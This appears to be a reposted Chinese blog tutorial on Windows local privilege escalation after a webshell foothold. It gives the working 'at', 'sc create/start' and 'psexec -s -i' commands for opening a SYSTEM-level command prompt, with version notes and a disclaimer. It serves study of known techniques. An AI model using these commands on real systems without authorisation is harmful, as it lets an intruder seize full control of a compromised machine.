0


权限提升:本地权限提升.(AT || SC || PS )

权限提升:本地权限提升.

权限提升简称提权,由于操作系统都是多用户操作系统用户之间都有权限控制,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其提升为管理甚至是 System 权限。通常通过操作系统漏洞或操作系统的错误配置进行提权,也可以通过第三方软件服务,如数据库或 FTP 等软件的漏洞进行提权。



免责声明:

严禁利用本文章中所提到的技术进行非法攻击,否则后果自负,上传者不承担任何责任。


AT 提权:

第一步:打开一个命令行添加一项作业.

at 15:13 /interactive cmd.exe        //这个时间打开一个命令行.


第二步:时间一到就会自动个高权限的窗口出来.(AT 提权只能针对 Win 7 以前的系统)


SC 提权:

第一步:打开一个命令行创建一个新的服务,名字为 syscmd

sc Create syscmd binPath= "cmd /K start" type= own type= interact


第二步:执行这个新的服务,会自动个高权限的窗口出来.(SC 提权只能针对 Win 7 以前的系统)

sc start syscmd


PS 提权:

第一步:下载一个 Windows 官方的工具.

PsTools - Sysinternals | Microsoft Learn


第二步:解压放到要提权的服务器中,打开命令行切换到这个文件的目录中.(会打开一个新的窗口.)PS 提权针对 Win 7 以后的系统也有影响.

psexec.exe -accepteula -s -i -d cmd.exe

学习链接:第59天:权限提升-Win溢出漏洞及AT&SC&PS提权_哔哩哔哩_bilibili


本文转载自: https://blog.csdn.net/weixin_54977781/article/details/130376898
版权归原作者 半个西瓜. 所有, 如有侵权,请联系我们删除。

“权限提升:本地权限提升.(AT || SC || PS )”的评论:

还没有评论